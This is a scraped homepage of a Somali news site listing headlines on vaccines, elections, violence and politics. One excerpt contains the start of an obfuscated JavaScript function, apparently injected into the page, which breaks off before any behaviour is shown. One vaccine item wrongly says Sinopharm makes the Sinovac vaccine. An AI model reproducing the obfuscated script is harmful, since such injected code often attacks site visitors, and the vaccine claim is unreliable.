Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Somalia pens deal with China’s Sinopharm for 200,000 COVID-19 vaccines

Somalia has signed a deal with Sinopharm, the Chinese company that produces the Sinovac COVID-19 vaccine, for the delivery of 200,000 doses.

Labo caruur ah oo si arxan darro ahaa loogu dilay duleedka Baydhabo

Meydadka caruur si arxan darro ahaa loo dilay ayaa waxaa saaka laga helay duleedka magaalada Baydhabo ee xarunta gobolka Bay, sida ay...

Maxay ka wada-hadleen beesha caalamka & qaar ka mid ah madax goboleedyada?

Wakiilada Beesha Caalamka ayaa xalay magaalada Muqdisho kulan gaar ah kula yeeshay madaxweynayaasha dowlad goboleedyada HirShabelle, Koonfur Galbeed iyo Galmudug oo taageersan...

Dhageyso: Warka subax ee Idaacadda Shabelle

Halkan hoose ka dhageyso warka subax Idaacadda Shabelle ee magaalada Muqdisho. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return...

Dagaal khasaare geystay oo ka dhacay gobolka Shabeelaha Dhexe

Wararka laga helayo gobolka Shabeelaha Dhexe ayaa sheegaya in saacadihii lasoo dhaafay dagaal u dhexeeyey ciidamada dowladda iyo Al-Shabaab uu ka dhacay...

Duqa Muqdisho oo kulan la qaatay waxgaradka 5 degmo + Sawirro

Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Cumar Maxamuud Maxamed (Cumar Filish) ayaa Barnaamijka la tashiga dadweynaha oo uu maskaxdiisa lahaa...

Somali Govt says election talks failed

The government of Somalia announced Wednesday that the latest round of the talks between president Farmajo and leaders of the Federal States...

Shirkii ka socday Afisyooni oo natiijo la’aan kusoo dhammaaday + sababta

Shirkii u dhexeeyay dowladda federaalka ah ee Soomaaliya, dowlad goboleedyada iyo gobolka Banaadir ayaa mar kale la'isku mari waayey, gaar ahaan qodobadii...

Somalia: Erdogan Hospital gives food aid to the orphanage

The administration of the Recep Tayyip Erdogan Training and Research Hospital in Mogadishu on Tuesday delivered food aid to Imamu-Nawawi Orphanage Center...

Shirkii Golaha Wadatashiga Arrimaha Doorashooyinka oo ka furmay Afisyooni

Shirkii Golaha Wadatashiga Arrimaha Doorashooyinka ayaa goor dhow ka furmay Teendhada Afisyooni ee magaalada Muqdisho, kaas oo looga arrinsanayo xaaladda siyaasadeed ee...

WARAR KALE

Dowladda Soomaaliya oo sheegtay inay weli diyaar u tahay wada-hadalka mucaaradka

MUQDISHO, Soomaaliya — Dowladda Federaalka Soomaaliya ayaa weli diyaar u ah inay wada-hadal la yeelato mucaaradka si loo xalliyo khilaafaadka siyaasadeed ee ka taagan...

Somalia government says door remains open to talks with opposition

MOGADISHU, Somalia — Somalia’s federal government remains ready to hold talks with opposition groups to resolve political disputes over the country’s expected 2027 elections...

Wasiirka Amniga Gudaha Soomaaliya oo ka qeybgalay Madasha Caalamiga ah ee Amniga ee Shiinaha

LIANYUNGANG, Shiinaha — Wasiirka Amniga Gudaha Xukuumadda Federaalka Soomaaliya, Cabdullaahi Sheekh Ismaaciil Fartaag, ayaa Khamiistii ka qeybgalay furitaanka Madasha Caalamiga ah ee Iskaashiga Amniga...